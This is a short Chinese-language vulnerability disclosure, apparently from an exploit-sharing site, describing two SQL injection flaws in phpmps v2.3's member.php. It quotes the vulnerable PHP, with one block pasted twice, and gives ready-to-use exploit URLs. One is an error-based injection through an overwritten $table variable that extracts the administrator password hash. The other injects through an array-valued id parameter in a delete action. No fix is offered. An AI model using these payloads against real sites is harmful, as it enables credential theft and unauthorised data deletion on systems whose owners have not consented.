phpmps_v2.3最新版两处SQL注入漏洞

摘要

member.php 422 - 455[php]
case 'exchange':
$units = array('gold'=>'枚', 'money'=>'元', 'credit'=>'分');
$types = array('money'=>'资金', 'gold'=>'信息币', 'credit'=>'积分');
$notes = array('login'=>'登陆积分', 'post_info_credit'=>'发布信息积分' ,'post_comment_credit'=>'发布评论积分' ,'info_refer'=>'一键更新信息' ,'info_top'=>'信息置顶' , 'credit2gold'=>'积分兑换信息币', 'money2gold'=>'资金购买信息币');
extract($_REQUEST);
$page = isset($page) ? intval($page) : 1;
$pagesize = 20;
$sql = '';
if($type) $sql .= " AND type='$type' ";
if($begindate) {
$begintime = strtotime($begindate.' 00:00:00');
$sql .= " AND addtime>=$begintime ";
}
if($enddate) {
$endtime = strtotime($enddate.' 23:59:59');
$sql .= " AND addtime<=$endtime";
}
$r = $db->getOne("SELECT count(*) as number FROM {$table}pay_exchange WHERE username='$_username' $sql");
$pager['search'] = array('act' => 'exchange');
$pager = get_pager('member.php', $pager['search'], $r, $page, $pagesize);

member.php 422 - 455

[php]
case 'exchange':
$units = array('gold'=>'枚', 'money'=>'元', 'credit'=>'分');
$types = array('money'=>'资金', 'gold'=>'信息币', 'credit'=>'积分');
$notes = array('login'=>'登陆积分', 'post_info_credit'=>'发布信息积分' ,'post_comment_credit'=>'发布评论积分' ,'info_refer'=>'一键更新信息' ,'info_top'=>'信息置顶' , 'credit2gold'=>'积分兑换信息币', 'money2gold'=>'资金购买信息币');
extract($_REQUEST);
$page = isset($page) ? intval($page) : 1;
$pagesize = 20;
$sql = '';
if($type) $sql .= " AND type='$type' ";
if($begindate) {
$begintime = strtotime($begindate.' 00:00:00');
$sql .= " AND addtime>=$begintime ";
}
if($enddate) {
$endtime = strtotime($enddate.' 23:59:59');
$sql .= " AND addtime<=$endtime";
}
$r = $db->getOne("SELECT count(*) as number FROM {$table}pay_exchange WHERE username='$_username' $sql");
$pager['search'] = array('act' => 'exchange');
$pager = get_pager('member.php', $pager['search'], $r, $page, $pagesize);

$exchanges = array();

$result = $db->query("SELECT * FROM {$table}pay_exchange WHERE username='$_username' $sql ORDER BY exchangeid DESC LIMIT $pager[start],$pager[size]");

while($r = $db->fetchrow($result)) {

$r['unit'] = $units[$r['type']];

$r['type'] = $types[$r['type']];

$r['note'] = !empty($notes[$r['note']]) ? $notes[$r['note']] : $r['note'];

$r['addtime'] = date('Y-m-d h:i:s', $r['addtime']);

$exchanges[] = $r;

}

$seo['title'] = '交易详情';

include template('member_exchange');

break;
[/php]

上面的代码使用了extract($_REQUEST);

导致我们可以覆盖任意变量，通过覆盖变量$table可以构造注入

利用如下：
[php]
http://www.0day5.com/phpmps/member.php?act=check_info_gold&table=phpmps_member%20where%201=1%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28select%20password%20from%20phpmps_admin%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
[/php]

SQL漏洞2：

member.php 741 - 746 SQL
http://www.0day5.com/phpmps/member.php?act=delete&id[]=1a
[php]
case 'delete':

$id = is_array($_REQUEST['id']) ? join(',', $_REQUEST['id']) : intval($_REQUEST['id']);

if(empty($id))showmsg('没有选择记录');

$db->query("DELETE FROM {$table}comment WHERE id IN ($id)");

showmsg('删除成功', 'member.php?act=info_comment');

break;
[/php]
这里没有考虑$id为数组的情况，当提交数组的时候可以注入。

如：http://www.0day5.com/phpmps/member.php?act=delete&id[]=1a